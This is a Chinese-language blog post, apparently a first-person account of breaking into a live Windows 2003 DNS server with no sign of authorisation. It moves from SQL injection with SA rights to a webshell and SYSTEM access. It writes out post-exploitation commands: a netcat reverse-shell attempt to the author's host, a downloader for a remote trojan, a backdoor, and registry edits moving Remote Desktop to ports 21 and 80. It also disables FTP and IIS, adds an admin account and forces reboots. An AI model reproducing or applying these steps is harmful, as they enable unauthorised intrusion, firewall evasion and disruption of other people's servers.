事情是這樣的:
遭遇一個dns服務器,win2003 server
掃描器報告的開放端口:21,53,80
ok,弄到一個sa權限的注射點,爽快得拿到一個webshell,透過sqlrootkit,俺就是system權限了.本以為對方菜到家了.誰知故事才剛剛開始.
ipconfig /all
不是內網機子,只有一個外網ip.ok
net start
terminal service開放
netstat -na
3389端口在的
保險期間:reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
端口確實是3389
因為前面通過查看服務看到系統(tǒng)防火墻服務開啟了,所以順便
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
查下是否防火墻屏蔽端口,結果是沒有.
接著本地 nc -v -l -p 99
對方:telnet myip 99
等了一會沒反應
嗯?連不到我? ping www.163.com 正常返回值
ping myip 由于我開著系統(tǒng)自帶的防火墻,就用sniffer探聽下數據,結果是對方能ping到我.怎么回事呢?
寫了個vbs下載腳本上去,下載了個反彈的馬試試,結果不上線(意料中)馬是絕對安裝成功的.安裝端口復用的后門,成功安裝,可依然連不上去
由于不能telnet 我本機探聽的端口,端口轉發(fā)行不通
難道是tcp/ip篩選?
regedit -e 導出了關于tcp/ip的幾個位置,查看了下,值都是0,也就是沒有配置IPSEC? 再次導出ip安全策略,下回本地,導入看了下,也是默認沒有任何特殊配置軟防?有可能.于是我tasklist 查看了進程,taskkill掉所有可疑的.(事實上我確實不能找到有軟防存在的跡象) 翻遍了整個目錄都沒有蹤跡.
最后的可能 硬防! 怎么突破呢? 我無法對硬防進行操作,只能在已經開放的端口上做文章了.于是 sc config msftpsvc start= disabled 把ftp服務禁用 導出終端服務關于端口配置的兩處
regedit -e C:\1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
regedit -e C:\2.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
修改為21的16進制值 15 ,regedit -s c:\1.reg 這樣導入兩個改過的注冊表文件,這樣終端端口就變成21了.
shutdown -f -t 3 -r 3秒后強制重啟服務器.
很快重啟完成,netstat -na 3389沒有了,21有.興奮ing,誰知道,本地連接居然還是連不上去.想不明白,繼續(xù),配置個radmin,連接端口為21,先sc 禁用終端服務,重啟后,安裝radmin.結果是沒有安裝成功.
奇怪的是,我在radmin連接器里新建連接,端口指向21的時候顯示21端口是open的,而通過sqlrootkit執(zhí)行netstat -na 卻看不到21端口存在.問題終于清楚了.
看來唯一能下手的只有 80了
ok,修改終端服務端口為80,sc禁用 iisadmin/w3svc/httpfilter 添加管理用戶 重啟服務器
1分鐘不到,終于登上了可愛的終端.

 

最新評論